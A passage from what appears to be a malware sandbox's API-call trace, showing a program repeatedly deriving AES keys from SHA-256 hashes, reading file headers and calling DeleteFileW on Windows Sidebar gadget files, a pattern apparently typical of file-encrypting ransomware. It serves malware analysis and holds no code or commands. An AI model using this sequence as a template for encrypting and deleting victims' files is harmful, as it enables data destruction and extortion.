lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.959] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.959] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0187.959] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.962] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml")) returned 0 [0187.962] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0187.963] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0187.964] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0187.964] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.964] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0187.964] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x47ac [0187.964] ReadFile (in: hFile=0x590, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0187.982] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0187.982] CryptDestroyKey (hKey=0x284d528) returned 1 [0187.982] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.983] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\cpu.js")) returned 0 [0187.983] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0187.984] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0187.984] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.984] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0187.984] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23e2 [0187.984] ReadFile (in: hFile=0x598, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0187.987] CryptDestroyHash (hHash=0x284d668) returned 1 [0187.987] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0187.987] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.988] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\icon.png")) returned 0 [0187.989] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0187.989] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.990] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.990] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.990] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0187.990] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x42e6 [0187.990] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.995] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.995] CryptDestroyKey (hKey=0x284d668) returned 1 [0187.995] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.996] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\back.png")) returned 0 [0187.997] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.997] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.997] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.997] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0187.997] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6651 [0187.997] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.001] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.001] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.001] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0188.003] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\back_lrg.png")) returned 0 [0188.003] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0188.004] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.004] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.004] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.004] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15a [0188.004] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.005] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.005] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.005] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0188.007] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial.png")) returned 0 [0188.008] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0188.008] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.008] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.008] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.008] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc91 [0188.008] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.025] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.025] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.025] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0188.026] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot.png")) returned 0 [0188.027] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0188.027] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.027] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.027] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.027] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfca [0188.027] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.030] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.030] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.030] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0188.031] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot_lrg.png")) returned 0 [0188.032] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0188.033] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.033] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.033] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.033] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0188.033] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.035] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.035] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.035] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0188.036] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg.png")) returned 0 [0188.037] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0188.037] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.037] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.037] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.038] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc03 [0188.038] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.040] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.040] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.040] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0188.041] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg_sml.png")) returned 0 [0188.043] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0188.043] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.043] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.043] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.043] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbd2 [0188.043] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.045] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.045] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.045] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0188.047] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_sml.png")) returned 0 [0188.047] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0188.048] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.048] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.048] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.048] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x134 [0188.048] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.049] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.049] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.049] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0188.051] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass.png")) returned 0 [0188.052] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0188.052] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.052] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.052] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.052] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1bb [0188.052] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.054] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.054] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.054] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0188.055] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass_lrg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass_lrg.png")) returned 0 [0188.056] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0188.056] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0188.056] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.056] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0188.057] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1816 [0188.057] ReadFile (in: hFile=0x5a0, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0188.075] CryptDestroyHash (hHash=0x284d568) returned 1 [0188.075] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0188.075] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0188.077] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\logo.png")) returned 0 [0188.077] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.092] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0188.093] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0188.093] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.093] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0188.093] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x406b [0188.093] ReadFile (in: hFile=0x598, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0188.096] CryptDestroyHash (hHash=0x284d668) returned 1 [0188.096] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0188.096] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.097] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\drag.png")) returned 0 [0188.098] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.098] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.098] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0188.099] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0188.099] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.099] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0188.099] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4c2e [0188.099] ReadFile (in: hFile=0x584, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0188.111] CryptDestroyHash (hHash=0x284d668) returned 1 [0188.111] CryptDestroyKey (hKey=0x284d528) returned 1 [0188.111] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.112] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\css\\currency.css")) returned 0 [0188.113] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.113] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.113] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.113] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0188.113] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1792 [0188.113] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.132] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.132] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0188.133] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.135] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\currency.html")) returned 0 [0188.135] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.136] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.136] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.136] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0188.136] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7a6 [0188.136] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.138] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.138] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0188.138] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.139] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml")) returned 0 [0188.140] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.154] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0188.155] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0188.155] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.155] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0188.155] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x104de [0188.155] ReadFile (in: hFile=0x590, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0188.177] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0188.177] CryptDestroyKey (hKey=0x284d528) returned 1 [0188.177] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.179] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\currency.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\currency.js")) returned 0 [0188.180] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0188.180] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: 